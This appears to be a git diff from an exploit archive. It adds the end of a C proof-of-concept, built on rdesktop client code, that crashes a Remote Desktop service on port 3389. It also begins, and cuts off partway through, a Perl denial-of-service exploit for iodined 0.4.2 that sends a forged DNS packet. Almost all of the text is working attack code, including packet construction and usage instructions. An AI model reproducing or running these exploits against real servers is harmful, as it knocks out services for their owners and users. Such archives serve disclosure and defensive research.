+ + out_uint16_le(s, length); + out_uint16_le(s, (RDP_PDU_DATA | 0x10)); + out_uint16_le(s, (mcs_userid + 1001)); + + out_uint32_le(s, rdp_shareid); + out_uint8(s, 0); /* pad */ + out_uint8(s, 1); /* streamid */ + out_uint16_le(s, (length - 14)); + out_uint8(s, data_pdu_type); + out_uint8(s, 0); /* compress_type */ + out_uint16(s, 0); /* compress_len */ + + sec_send(s, encryption ? SEC_ENCRYPT : 0); +} + +/* Output a string in Unicode */ +void +rdp_out_unistr(STREAM s, char *string, int len) +{ + int i = 0, j = 0; + + len += 2; + + while (i < len) + { + s->p[i++] = string[j++]; + s->p[i++] = 0; + } + + s->p += len; +} + +/* Parse a logon info packet */ +static void +rdp_send_logon_info(uint32 flags, char *domain, char *user, + char *password, char *program, char *directory) +{ + int len_domain = 2 * strlen(domain); + int len_user = 2 * strlen(user); + int len_password = 2 * strlen(password); + int len_program = 2 * strlen(program); + int len_directory = 2 * strlen(directory); + uint32 sec_flags = encryption ? (SEC_LOGON_INFO | SEC_ENCRYPT) : SEC_LOGON_INFO; + STREAM s; + + s = sec_init(sec_flags, 18 + len_domain + len_user + len_password + + len_program + len_directory + 10); + + out_uint32(s, 0); + out_uint32_le(s, flags); + out_uint16_le(s, len_domain); + out_uint16_le(s, len_user); + out_uint16_le(s, len_password); + out_uint16_le(s, len_program); + out_uint16_le(s, len_directory); + rdp_out_unistr(s, domain, len_domain); + rdp_out_unistr(s, user, len_user); + rdp_out_unistr(s, password, len_password); + rdp_out_unistr(s, program, len_program); + rdp_out_unistr(s, directory, len_directory); + + s_mark_end(s); + sec_send(s, sec_flags); +} + +/* Send a control PDU */ +static void +rdp_send_control(uint16 action) +{ + STREAM s; + + s = rdp_init_data(8); + + out_uint16_le(s, action); + out_uint16(s, 0); /* userid */ + out_uint32(s, 0); /* control id */ + + s_mark_end(s); + rdp_send_data(s, RDP_DATA_PDU_CONTROL); +} + +/* Send a synchronisation PDU */ +static void +rdp_send_synchronise(void) +{ + STREAM s; + + s = rdp_init_data(4); + + out_uint16_le(s, 1); /* type */ + out_uint16_le(s, 1002); + + s_mark_end(s); + rdp_send_data(s, RDP_DATA_PDU_SYNCHRONISE); +} + +/* Send a single input event */ +void +rdp_send_input(uint32 time, uint16 message_type, uint16 device_flags, uint16 param1, uint16 param2) +{ + STREAM s; + + s = rdp_init_data(16); + + out_uint16_le(s, 1); /* number of events */ + out_uint16(s, 0); /* pad */ + + out_uint32_le(s, time); + out_uint16_le(s, message_type); + out_uint16_le(s, device_flags); + out_uint16_le(s, param1); + out_uint16_le(s, param2); + + s_mark_end(s); + rdp_send_data(s, RDP_DATA_PDU_INPUT); +} + +/* Send an (empty) font information PDU */ +static void +rdp_send_fonts(uint16 seq) +{ + STREAM s; + + s = rdp_init_data(8); + + out_uint16(s, 0); /* number of fonts */ + out_uint16_le(s, 0x3e); /* unknown */ + out_uint16_le(s, seq); /* unknown */ + out_uint16_le(s, 0x32); /* entry size */ + + s_mark_end(s); + rdp_send_data(s, RDP_DATA_PDU_FONT2); +} + +/* Output general capability set */ +static void +rdp_out_general_caps(STREAM s) +{ + out_uint16_le(s, RDP_CAPSET_GENERAL); + out_uint16_le(s, RDP_CAPLEN_GENERAL); + + out_uint16_le(s, 1); /* OS major type */ + out_uint16_le(s, 3); /* OS minor type */ + out_uint16_le(s, 0x200); /* Protocol version */ + out_uint16(s, 0); /* Pad */ + out_uint16(s, 0); /* Compression types */ + out_uint16(s, 0); /* Pad */ + out_uint16(s, 0); /* Update capability */ + out_uint16(s, 0); /* Remote unshare capability */ + out_uint16(s, 0); /* Compression level */ + out_uint16(s, 0); /* Pad */ +} + +/* Output bitmap capability set */ +static void +rdp_out_bitmap_caps(STREAM s) +{ + out_uint16_le(s, RDP_CAPSET_BITMAP); + out_uint16_le(s, RDP_CAPLEN_BITMAP); + + out_uint16_le(s, 8); /* Preferred BPP */ + out_uint16_le(s, 1); /* Receive 1 BPP */ + out_uint16_le(s, 1); /* Receive 4 BPP */ + out_uint16_le(s, 1); /* Receive 8 BPP */ + out_uint16_le(s, 800); /* Desktop width */ + out_uint16_le(s, 600); /* Desktop height */ + out_uint16(s, 0); /* Pad */ + out_uint16(s, 0); /* Allow resize */ + out_uint16_le(s, bitmap_compression ? 1 : 0); /* Support compression */ + out_uint16(s, 0); /* Unknown */ + out_uint16_le(s, 1); /* Unknown */ + out_uint16(s, 0); /* Pad */ +} + +/* Output order capability set */ +static void +rdp_out_order_caps(STREAM s) +{ + uint8 order_caps[32]; + + + memset(order_caps, 0, 32); + order_caps[0] = 1; /* dest blt */ + order_caps[1] = 1; /* pat blt */ + order_caps[2] = 1; /* screen blt */ + order_caps[3] = 1; /* required for memblt? */ + order_caps[8] = 1; /* line */ + order_caps[9] = 1; /* line */ + order_caps[10] = 1; /* rect */ + order_caps[11] = (desktop_save == False ? 0 : 1); /* desksave */ + order_caps[13] = 1; /* memblt */ + order_caps[14] = 1; /* triblt */ + order_caps[22] = 1; /* polyline */ + order_caps[27] = 1; /* text2 */ + out_uint16_le(s, RDP_CAPSET_ORDER); + out_uint16_le(s, RDP_CAPLEN_ORDER); + + out_uint8s(s, 20); /* Terminal desc, pad */ + out_uint16_le(s, 1); /* Cache X granularity */ + out_uint16_le(s, 20); /* Cache Y granularity */ + out_uint16(s, 0); /* Pad */ + out_uint16_le(s, 1); /* Max order level */ + out_uint16_le(s, 0x147); /* Number of fonts */ + out_uint16_le(s, 0x2a); /* Capability flags */ + out_uint8p(s, order_caps, 32); /* Orders supported */ + out_uint16_le(s, 0x6a1); /* Text capability flags */ + out_uint8s(s, 6); /* Pad */ + out_uint32_le(s, desktop_save == False ? 0 : 0x38400); /* Desktop cache size */ + out_uint32(s, 0); /* Unknown */ + out_uint32_le(s, 0x4e4); /* Unknown */ +} + +/* Output bitmap cache capability set */ +static void +rdp_out_bmpcache_caps(STREAM s) +{ + out_uint16_le(s, RDP_CAPSET_BMPCACHE); + out_uint16_le(s, RDP_CAPLEN_BMPCACHE); + + out_uint8s(s, 24); /* unused */ + out_uint16_le(s, 0x258); /* entries */ + out_uint16_le(s, 0x100); /* max cell size */ + out_uint16_le(s, 0x12c); /* entries */ + out_uint16_le(s, 0x400); /* max cell size */ + out_uint16_le(s, 0x106); /* entries */ + out_uint16_le(s, 0x1000); /* max cell size */ +} + +/* Output control capability set */ +static void +rdp_out_control_caps(STREAM s) +{ + out_uint16_le(s, RDP_CAPSET_CONTROL); + out_uint16_le(s, RDP_CAPLEN_CONTROL); + + out_uint16(s, 0); /* Control capabilities */ + out_uint16(s, 0); /* Remote detach */ + out_uint16_le(s, 2); /* Control interest */ + out_uint16_le(s, 2); /* Detach interest */ +} + +/* Output activation capability set */ +static void +rdp_out_activate_caps(STREAM s) +{ + out_uint16_le(s, RDP_CAPSET_ACTIVATE); + out_uint16_le(s, RDP_CAPLEN_ACTIVATE); + + out_uint16(s, 0); /* Help key */ + out_uint16(s, 0); /* Help index key */ + out_uint16(s, 0); /* Extended help key */ + out_uint16(s, 0); /* Window activate */ +} + +/* Output pointer capability set */ +static void +rdp_out_pointer_caps(STREAM s) +{ + out_uint16_le(s, RDP_CAPSET_POINTER); + out_uint16_le(s, RDP_CAPLEN_POINTER); + + out_uint16(s, 0); /* Colour pointer */ + out_uint16_le(s, 20); /* Cache size */ +} + +/* Output share capability set */ +static void +rdp_out_share_caps(STREAM s) +{ + out_uint16_le(s, RDP_CAPSET_SHARE); + out_uint16_le(s, RDP_CAPLEN_SHARE); + + out_uint16(s, 0); /* userid */ + out_uint16(s, 0); /* pad */ +} + +/* Output colour cache capability set */ +static void +rdp_out_colcache_caps(STREAM s) +{ + out_uint16_le(s, RDP_CAPSET_COLCACHE); + out_uint16_le(s, RDP_CAPLEN_COLCACHE); + + out_uint16_le(s, 6); /* cache size */ + out_uint16(s, 0); /* pad */ +} + +static uint8 canned_caps[] = { + 0x01, 0x00, 0x00, 0x00, 0x09, 0x04, 0x00, 0x00, 0x04, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0C, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x0C, 0x00, 0x08, 0x00, 0x01, + 0x00, 0x00, 0x00, 0x0E, 0x00, 0x08, 0x00, 0x01, 0x00, 0x00, 0x00, + 0x10, 0x00, 0x34, 0x00, 0xFE, + 0x00, 0x04, 0x00, 0xFE, 0x00, 0x04, 0x00, 0xFE, 0x00, 0x08, 0x00, + 0xFE, 0x00, 0x08, 0x00, 0xFE, + 0x00, 0x10, 0x00, 0xFE, 0x00, 0x20, 0x00, 0xFE, 0x00, 0x40, 0x00, + 0xFE, 0x00, 0x80, 0x00, 0xFE, + 0x00, 0x00, 0x01, 0x40, 0x00, 0x00, 0x08, 0x00, 0x01, 0x00, 0x01, + 0x02, 0x00, 0x00, 0x00 +}; + +/* Output unknown capability set */ +static void +rdp_out_unknown_caps(STREAM s) +{ + out_uint16_le(s, RDP_CAPSET_UNKNOWN); + out_uint16_le(s, 0x58); + + out_uint8p(s, canned_caps, RDP_CAPLEN_UNKNOWN - 4); +} + +/* Send a confirm active PDU */ +static void +rdp_send_confirm_active(void) +{ + STREAM s; + uint16 caplen = + RDP_CAPLEN_GENERAL + RDP_CAPLEN_BITMAP + RDP_CAPLEN_ORDER + + RDP_CAPLEN_BMPCACHE + RDP_CAPLEN_COLCACHE + + RDP_CAPLEN_ACTIVATE + RDP_CAPLEN_CONTROL + + RDP_CAPLEN_POINTER + RDP_CAPLEN_SHARE + RDP_CAPLEN_UNKNOWN + 4 /* w2k fix, why? */ ; + + s = rdp_init(14 + caplen + sizeof(RDP_SOURCE)); + + out_uint32_le(s, rdp_shareid); + out_uint16_le(s, 0x3ea); /* userid */ + out_uint16_le(s, sizeof(RDP_SOURCE)); + out_uint16_le(s, caplen); + + out_uint8p(s, RDP_SOURCE, sizeof(RDP_SOURCE)); + out_uint16_le(s, 0xd); /* num_caps */ + out_uint8s(s, 2); /* pad */ + + rdp_out_general_caps(s); + rdp_out_bitmap_caps(s); + rdp_out_order_caps(s); + rdp_out_bmpcache_caps(s); + rdp_out_colcache_caps(s); + rdp_out_activate_caps(s); + rdp_out_control_caps(s); + rdp_out_pointer_caps(s); + rdp_out_share_caps(s); + rdp_out_unknown_caps(s); + + s_mark_end(s); + rdp_send(s, RDP_PDU_CONFIRM_ACTIVE); +} + + + +/* Process incoming packets */ +void +rdp_main_loop(void) +{ + uint8 type; + STREAM s; + + while ((s = rdp_recv(&type)) != NULL) + { + switch (type) + { + case RDP_PDU_DEMAND_ACTIVE: + process_demand_active(s); + break; + + case RDP_PDU_DEACTIVATE: + break; + + case RDP_PDU_DATA: + process_data_pdu(s); + break; + case 0: + break; + + } + } +} + +/* Establish a connection up to the RDP layer */ +BOOL +rdp_connect(char *server, uint32 flags, char *domain, char *password, + char *command, char *directory) +{ + if (!sec_connect(server)) + return False; + + rdp_send_logon_info(flags, domain, username, password, command, directory); + return True; +} + +/* Disconnect from the RDP layer */ +void +rdp_disconnect(void) +{ + sec_disconnect(); +} + + + +/* Reset order state */ +void +reset_order_state(void) +{ + memset(&order_state, 0, sizeof(order_state)); + order_state.order_type = RDP_ORDER_PATBLT; +} + + +static void +reverse(uint8 * p, int len) +{ + int i, j; + uint8 temp; + + for (i = 0, j = len - 1; i < j; i++, j--) + { + temp = p[i]; + p[i] = p[j]; + p[j] = temp; + } +} + + +/* + * General purpose 48-byte transformation, using two 32-byte salts (generally, + * a client and server salt) and a global salt value used for padding. + * Both SHA1 and MD5 algorithms are used. + */ +void +sec_hash_48(uint8 * out, uint8 * in, uint8 * salt1, uint8 * salt2, uint8 salt) +{ + uint8 shasig[20]; + uint8 pad[4]; + SHA_CTX sha; + MD5_CTX md5; + int i; + + for (i = 0; i < 3; i++) + { + memset(pad, salt + i, i + 1); + + SHA1_Init(&sha); + SHA1_Update(&sha, pad, i + 1); + SHA1_Update(&sha, in, 48); + SHA1_Update(&sha, salt1, 32); + SHA1_Update(&sha, salt2, 32); + SHA1_Final(shasig, &sha); + + MD5_Init(&md5); + MD5_Update(&md5, in, 48); + MD5_Update(&md5, shasig, 20); + MD5_Final(&out[i * 16], &md5); + } +} + +/* + * Weaker 16-byte transformation, also using two 32-byte salts, but + * only using a single round of MD5. + */ +void +sec_hash_16(uint8 * out, uint8 * in, uint8 * salt1, uint8 * salt2) +{ + MD5_CTX md5; + + MD5_Init(&md5); + MD5_Update(&md5, in, 16); + MD5_Update(&md5, salt1, 32); + MD5_Update(&md5, salt2, 32); + MD5_Final(out, &md5); +} + +/* Reduce key entropy from 64 to 40 bits */ +static void +sec_make_40bit(uint8 * key) +{ + key[0] = 0xd1; + key[1] = 0x26; + key[2] = 0x9e; +} + +/* Generate a session key and RC4 keys, given client and server randoms */ +static void +sec_generate_keys(uint8 * client_key, uint8 * server_key, int rc4_key_size) +{ + uint8 session_key[48]; + uint8 temp_hash[48]; + uint8 input[48]; + + /* Construct input data to hash */ + memcpy(input, client_key, 24); + memcpy(input + 24, server_key, 24); + + /* Generate session key - two rounds of sec_hash_48 */ + sec_hash_48(temp_hash, input, client_key, server_key, 65); + sec_hash_48(session_key, temp_hash, client_key, server_key, 88); + + /* Store first 16 bytes of session key, for generating signatures */ + memcpy(sec_sign_key, session_key, 16); + + /* Generate RC4 keys */ + sec_hash_16(sec_decrypt_key, &session_key[16], client_key, server_key); + sec_hash_16(sec_encrypt_key, &session_key[32], client_key, server_key); + + if (rc4_key_size == 1) + { + + sec_make_40bit(sec_sign_key); + sec_make_40bit(sec_decrypt_key); + sec_make_40bit(sec_encrypt_key); + rc4_key_len = 8; + } + else + { + + rc4_key_len = 16; + } + + /* Save initial RC4 keys as update keys */ + memcpy(sec_decrypt_update_key, sec_decrypt_key, 16); + memcpy(sec_encrypt_update_key, sec_encrypt_key, 16); + + /* Initialise RC4 state arrays */ + RC4_set_key(&rc4_decrypt_key, rc4_key_len, sec_decrypt_key); + RC4_set_key(&rc4_encrypt_key, rc4_key_len, sec_encrypt_key); +} + +static uint8 pad_54[40] = { + 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, + 54, 54, 54, + 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, + 54, 54, 54 +}; + +static uint8 pad_92[48] = { + 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, + 92, 92, 92, 92, 92, 92, 92, + 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, + 92, 92, 92, 92, 92, 92, 92 +}; + + +/* Transmit secure transport packet */ +void +sec_send(STREAM s, uint32 flags) +{ + int datalen; + + s_pop_layer(s, sec_hdr); + if (!licence_issued || (flags & SEC_ENCRYPT)) + out_uint32_le(s, flags); + + if (flags & SEC_ENCRYPT) + { + flags &= ~SEC_ENCRYPT; + datalen = s->end - s->p - 8; + +#if WITH_DEBUG + DEBUG(("Sending encrypted packet:\n")); + hexdump(s->p + 8, datalen); +#endif + + + } + + mcs_send(s); +} + + +/* Perform an RSA public key encryption operation */ +static void +sec_rsa_encrypt(uint8 * out, uint8 * in, int len, uint8 * modulus, uint8 * exponent) +{ + BN_CTX *ctx; + BIGNUM mod, exp, x, y; + uint8 inr[SEC_MODULUS_SIZE]; + int outlen; + + reverse(modulus, SEC_MODULUS_SIZE); + reverse(exponent, SEC_EXPONENT_SIZE); + memcpy(inr, in, len); + reverse(inr, len); + + ctx = BN_CTX_new(); + BN_init(&mod); + BN_init(&exp); + BN_init(&x); + BN_init(&y); + + BN_bin2bn(modulus, SEC_MODULUS_SIZE, &mod); + BN_bin2bn(exponent, SEC_EXPONENT_SIZE, &exp); + BN_bin2bn(inr, len, &x); + BN_mod_exp(&y, &x, &exp, &mod, ctx); + outlen = BN_bn2bin(&y, out); + reverse(out, outlen); + if (outlen < SEC_MODULUS_SIZE) + memset(out + outlen, 0, SEC_MODULUS_SIZE - outlen); + + BN_free(&y); + BN_clear_free(&x); + BN_free(&exp); + BN_free(&mod); + BN_CTX_free(ctx); +} + +/* Initialise secure transport packet */ +STREAM +sec_init(uint32 flags, int maxlen) +{ + int hdrlen; + STREAM s; + + if (!licence_issued) + hdrlen = (flags & SEC_ENCRYPT) ? 12 : 4; + else + hdrlen = (flags & SEC_ENCRYPT) ? 12 : 0; + s = mcs_init(maxlen + hdrlen); + s_push_layer(s, sec_hdr, hdrlen); + + return s; +} + + + + +/* Output connect initial data blob */ +static void +sec_out_mcs_data(STREAM s) +{ + int hostlen = 2 * strlen(hostname); + + if (hostlen > 30) + hostlen = 30; + + out_uint16_be(s, 5); /* unknown */ + out_uint16_be(s, 0x14); + out_uint8(s, 0x7c); + out_uint16_be(s, 1); + + out_uint16_be(s, (158 | 0x8000)); /* remaining length */ + + out_uint16_be(s, 8); /* length? */ + out_uint16_be(s, 16); + out_uint8(s, 0); + out_uint16_le(s, 0xc001); + out_uint8(s, 0); + + out_uint32_le(s, 0x61637544); /* "Duca" ?! */ + out_uint16_be(s, (144 | 0x8000)); /* remaining length */ + + /* Client information */ + out_uint16_le(s, SEC_TAG_CLI_INFO); + out_uint16_le(s, 136); /* length */ + out_uint16_le(s, 1); + out_uint16_le(s, 8); + out_uint16_le(s, width); + out_uint16_le(s, height); + out_uint16_le(s, 0xca01); + out_uint16_le(s, 0xaa03); + out_uint32_le(s, keylayout); + out_uint32_le(s, 419); /* client build? we are 419 compatible :-) */ + + /* Unicode name of client, padded to 32 bytes */ + rdp_out_unistr(s, hostname, hostlen); + out_uint8s(s, 30 - hostlen); + + out_uint32_le(s, 4); + out_uint32(s, 0); + out_uint32_le(s, 12); + out_uint8s(s, 64); /* reserved? 4 + 12 doublewords */ + + out_uint16_le(s, 0xca01); + out_uint16(s, 0); + + /* Client encryption settings */ + out_uint16_le(s, SEC_TAG_CLI_CRYPT); + out_uint16_le(s, 8); /* length */ + out_uint32_le(s, encryption ? 0x3 : 0); /* encryption supported, 128-bit supported */ + s_mark_end(s); +} + +/* Parse a public key structure */ +static BOOL +sec_parse_public_key(STREAM s, uint8 ** modulus, uint8 ** exponent) +{ + uint32 magic, modulus_len; + + in_uint32_le(s, magic); + if (magic != SEC_RSA_MAGIC) + { + error("RSA magic 0x%x\n", magic); + return False; + } + + in_uint32_le(s, modulus_len); + if (modulus_len != SEC_MODULUS_SIZE + SEC_PADDING_SIZE) + { + error("modulus len 0x%x\n", modulus_len); + return False; + } + + in_uint8s(s, 8); /* modulus_bits, unknown */ + in_uint8p(s, *exponent, SEC_EXPONENT_SIZE); + in_uint8p(s, *modulus, SEC_MODULUS_SIZE); + in_uint8s(s, SEC_PADDING_SIZE); + + return s_check(s); +} + +/* Parse a crypto information structure */ +static BOOL +sec_parse_crypt_info(STREAM s, uint32 * rc4_key_size, + uint8 ** server_random, uint8 ** modulus, uint8 ** exponent) +{ + uint32 crypt_level, random_len, rsa_info_len; + uint16 tag, length; + uint8 *next_tag, *end; + + in_uint32_le(s, *rc4_key_size); /* 1 = 40-bit, 2 = 128-bit */ + in_uint32_le(s, crypt_level); /* 1 = low, 2 = medium, 3 = high */ + if (crypt_level == 0) /* no encryptation */ + return False; + in_uint32_le(s, random_len); + in_uint32_le(s, rsa_info_len); + + if (random_len != SEC_RANDOM_SIZE) + { + error("random len %d\n", random_len); + return False; + } + + in_uint8p(s, *server_random, random_len); + + /* RSA info */ + end = s->p + rsa_info_len; + if (end > s->end) + return False; + + in_uint8s(s, 12); /* unknown */ + + while (s->p < end) + { + in_uint16_le(s, tag); + in_uint16_le(s, length); + + next_tag = s->p + length; + + switch (tag) + { + case SEC_TAG_PUBKEY: + if (!sec_parse_public_key(s, modulus, exponent)) + return False; + + break; + + case SEC_TAG_KEYSIG: + /* Is this a Microsoft key that we just got? */ + /* Care factor: zero! */ + break; + } + + s->p = next_tag; + } + + return s_check_end(s); +} + +/* Process crypto information blob */ +static void +sec_process_crypt_info(STREAM s) +{ + uint8 *server_random, *modulus, *exponent; + uint8 client_random[SEC_RANDOM_SIZE]; + uint32 rc4_key_size; + + if (!sec_parse_crypt_info(s, &rc4_key_size, &server_random, &modulus, &exponent)) + return; + + /* Generate a client random, and hence determine encryption keys */ + sec_rsa_encrypt(sec_crypted_random, client_random, SEC_RANDOM_SIZE, modulus, exponent); + sec_generate_keys(client_random, server_random, rc4_key_size); +} + +/* Process connect response data blob */ +static void +sec_process_mcs_data(STREAM s) +{ + uint16 tag, length; + uint8 *next_tag; + uint8 len; + + in_uint8s(s, 21); /* header */ + in_uint8(s, len); + if (len & 0x80) + in_uint8(s, len); + + while (s->p < s->end) + { + in_uint16_le(s, tag); + in_uint16_le(s, length); + + if (length <= 4) + return; + + next_tag = s->p + length - 4; + + switch (tag) + { + case SEC_TAG_SRV_INFO: + case SEC_TAG_SRV_3: + break; + + case SEC_TAG_SRV_CRYPT: + sec_process_crypt_info(s); + break; + } + + s->p = next_tag; + } +} + +/* Receive secure transport packet */ +STREAM +sec_recv(void) +{ + uint32 sec_flags; + STREAM s; + + while ((s = mcs_recv()) != NULL) + { + if (encryption || !licence_issued) + { + in_uint32_le(s, sec_flags); + + if (sec_flags & SEC_LICENCE_NEG) + { + licence_process(s); + continue; + } + + if (sec_flags & SEC_ENCRYPT) + { + in_uint8s(s, 8); /* signature */ + + } + } + + return s; + } + + return NULL; +} + +/* Establish a secure connection */ +BOOL +sec_connect(char *server) +{ + struct stream mcs_data; + + /* We exchange some RDP data during the MCS-Connect */ + mcs_data.size = 512; + mcs_data.p = mcs_data.data = xmalloc(mcs_data.size); + sec_out_mcs_data(&mcs_data); + + if (!mcs_connect(server, &mcs_data)) + return False; + + sec_process_mcs_data(&mcs_data); + + xfree(mcs_data.data); + return True; +} + +/* Disconnect a connection */ +void +sec_disconnect(void) +{ + mcs_disconnect(); +} + + +/* Initialise TCP transport data packet */ +STREAM +tcp_init(int maxlen) +{ + if (maxlen > out.size) + { + out.size = maxlen; + } + + out.p = out.data; + out.end = out.data + out.size; + return &out; +} + +/* Send TCP transport data packet */ +void +tcp_send(STREAM s) +{ + int length = s->end - s->data; + int sent, total = 0; + + while (total < length) + { + sent = send(sock, s->data + total, length - total, 0); + if (sent <= 0) + { + fprintf(stderr, "\n[=] Check port 3389 on target host. It should be offline.\n\n"); + return; + } + + total += sent; + } +} + +/* Receive a message on the TCP layer */ +STREAM +tcp_recv(int length) +{ + int rcvd = 0; + + if (length > in.size) + { + + in.size = length; + } + + in.end = in.p = in.data; + + while (length > 0) + { + if (!ui_select(sock)) + /* User quit */ + return NULL; + + rcvd = recv(sock, in.end, length, 0); + if (rcvd == -1) + { + error("recv: %s", strerror(errno)); + return NULL; + } + + in.end += rcvd; + length -= rcvd; + } + + return ∈ +} + +/* Establish a connection on the TCP layer */ +BOOL +tcp_connect(char *server) +{ + struct hostent *nslookup; + struct sockaddr_in servaddr; + int true = 1; + + if ((nslookup = gethostbyname(server)) != NULL) + { + memcpy(&servaddr.sin_addr, nslookup->h_addr, sizeof(servaddr.sin_addr)); + } + else if ((servaddr.sin_addr.s_addr = inet_addr(server)) == INADDR_NONE) + { + error("%s: unable to resolve host\n", server); + return False; + } + + if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) + { + error("socket: %s\n", strerror(errno)); + return False; + } + + servaddr.sin_family = AF_INET; + servaddr.sin_port = htons(tcp_port_rdp); + + if (connect(sock, (struct sockaddr *) &servaddr, sizeof(struct sockaddr)) < 0) + { + error("connect: %s\n", strerror(errno)); + close(sock); + return False; + } + + setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (void *) &true, sizeof(true)); + + in.size = 4096; + in.data = xmalloc(in.size); + + out.size = 4096; + out.data = xmalloc(out.size); + + return True; +} + +/* Disconnect on the TCP layer */ +void +tcp_disconnect(void) +{ + fprintf(stderr, "\n[=] Done. Check port 3389 on the remote host.\n\n"); + close(sock); +} + + + +/* Returns 0 after user quit, 1 otherwise */ +int +ui_select(int rdp_socket) +{ + int n = (rdp_socket > x_socket) ? rdp_socket + 1 : x_socket + 1; + fd_set rfds; + + + +// Begin PoC mods + XEvent xevent; + KeySym keysym; + uint32 ev_time; + key_translation tr; + if (ix-- >= 0) + { return 1; } + ev_time = time(NULL); + handle_special_keys(keysym, xevent.xkey.state, ev_time, True); + tr = xkeymap_translate_key(keysym, xevent.xkey.keycode, xevent.xkey.state); + ensure_remote_modifiers(ev_time, tr); + rdp_send_scancode(ev_time, RDP_KEYPRESS, tr.scancode); +// End PoC mods + + + + FD_ZERO(&rfds); + while (True) + { + /* Process any events already waiting */ + +// if (!xwin_process_events()) +// /* User quit */ +// return 0; + + FD_ZERO(&rfds); + FD_SET(rdp_socket, &rfds); + FD_SET(x_socket, &rfds); + + switch (select(n, &rfds, NULL, NULL, NULL)) + { + case -1: + error("select: %s\n", strerror(errno)); + + case 0: + continue; + } + + if (FD_ISSET(rdp_socket, &rfds)) + return 1; + } +} + + +key_translation +xkeymap_translate_key(uint32 keysym, unsigned int keycode, unsigned int state) +{ + key_translation tr = { 0, 0 }; + + tr = keymap[keysym & KEYMAP_MASK]; + + if (tr.modifiers & MapInhibitMask) + { + + tr.scancode = 0; + return tr; + } + + if (tr.modifiers & MapLocalStateMask) + { + /* The modifiers to send for this key should be obtained + from the local state. Currently, only shift is implemented. */ + if (state & ShiftMask) + { + tr.modifiers = MapLeftShiftMask; + } + } + + if (tr.scancode != 0) + { + return tr; + } + + if (keymap_loaded) + + + /* not in keymap, try to interpret the raw scancode */ + if ((keycode >= min_keycode) && (keycode <= 0x60)) + { + tr.scancode = keycode - min_keycode; + + /* The modifiers to send for this key should be + obtained from the local state. Currently, only + shift is implemented. */ + if (state & ShiftMask) + { + tr.modifiers = MapLeftShiftMask; + } + + + } + else + { + + } + + return tr; +} + + +static void +update_modifier_state(uint8 scancode, BOOL pressed) +{ +#ifdef WITH_DEBUG_KBD + uint16 old_modifier_state; + + old_modifier_state = remote_modifier_state; +#endif + + switch (scancode) + { + case SCANCODE_CHAR_LSHIFT: + MASK_CHANGE_BIT(remote_modifier_state, MapLeftShiftMask, pressed); + break; + case SCANCODE_CHAR_RSHIFT: + MASK_CHANGE_BIT(remote_modifier_state, MapRightShiftMask, pressed); + break; + case SCANCODE_CHAR_LCTRL: + MASK_CHANGE_BIT(remote_modifier_state, MapLeftCtrlMask, pressed); + break; + case SCANCODE_CHAR_RCTRL: + MASK_CHANGE_BIT(remote_modifier_state, MapRightCtrlMask, pressed); + break; + case SCANCODE_CHAR_LALT: + MASK_CHANGE_BIT(remote_modifier_state, MapLeftAltMask, pressed); + break; + case SCANCODE_CHAR_RALT: + MASK_CHANGE_BIT(remote_modifier_state, MapRightAltMask, pressed); + break; + case SCANCODE_CHAR_LWIN: + MASK_CHANGE_BIT(remote_modifier_state, MapLeftWinMask, pressed); + break; + case SCANCODE_CHAR_RWIN: + MASK_CHANGE_BIT(remote_modifier_state, MapRightWinMask, pressed); + break; + case SCANCODE_CHAR_NUMLOCK: + /* KeyReleases for NumLocks are sent immediately. Toggle the + modifier state only on Keypress */ + if (pressed) + { + BOOL newNumLockState; + newNumLockState = + (MASK_HAS_BITS + (remote_modifier_state, MapNumLockMask) == False); + MASK_CHANGE_BIT(remote_modifier_state, + MapNumLockMask, newNumLockState); + } + break; + } + +#ifdef WITH_DEBUG_KBD + if (old_modifier_state != remote_modifier_state) + { + + old_modifier_state, pressed)); + + } +#endif + +} + + +/* free */ +void +xfree(void *mem) +{ + free(mem); +} + +/* report an error */ +void +error(char *format, ...) +{ + va_list ap; + + fprintf(stderr, "[=] Error: "); + + va_start(ap, format); + vfprintf(stderr, format, ap); + va_end(ap); +} + + + +/* malloc; exit if out of memory */ +void * +xmalloc(int size) +{ + void *mem = malloc(size); + if (mem == NULL) + { + error("xmalloc %d\n", size); + exit(1); + } + return mem; +} + +// milw0rm.com [2009-04-17] diff --git a/platforms/linux/dos/8544.pl b/platforms/linux/dos/8544.pl index 9a1ea8c75..d928de036 100755 --- a/platforms/linux/dos/8544.pl +++ b/platforms/linux/dos/8544.pl @@ -1,58 +1,58 @@ -#!/usr/bin/perl - -# iodined <= 0.4.2 DoS exploit -# -# by Albert Sellares -# http://www.wekk.net -# 2009-04-26 -# -# This exploit shuts down the iodined daemon using a forged DNS packet. -# It works on the last debian stable version (0.4.2-2). -# -# It produces a segmentation fault on the daemon side. - -use IO::Socket; -use strict; - -my $pkt_header = "\x00\x01\x01\x00\x00\x01\x00\x00\x00\x00\x00\x01\x0b\x56\x63\x61\x61\x61\x69\x61\x71\x61\x61\x64"; -my $pkt_footer = "\x00\x00\x0a\x00\x01\x00\x00\x29\x10\x00\x00\x00\x80\x00\x00\x00"; - -if ($#ARGV != 1) { - print "shoot-iodined <= 0.4.2 - \n". - "=============================================\n". - "Usage: ./shoot-iodined host domain\n". - " * host: Host addr where iodined is listening\n". - " * domain: Domain that iodined is using\n"; - exit 1; -} - -my $host = $ARGV[0]; -my $domain = $ARGV[1]; -my $template = 'a24'; -my @pkt;; -my $l; - -push(@pkt, 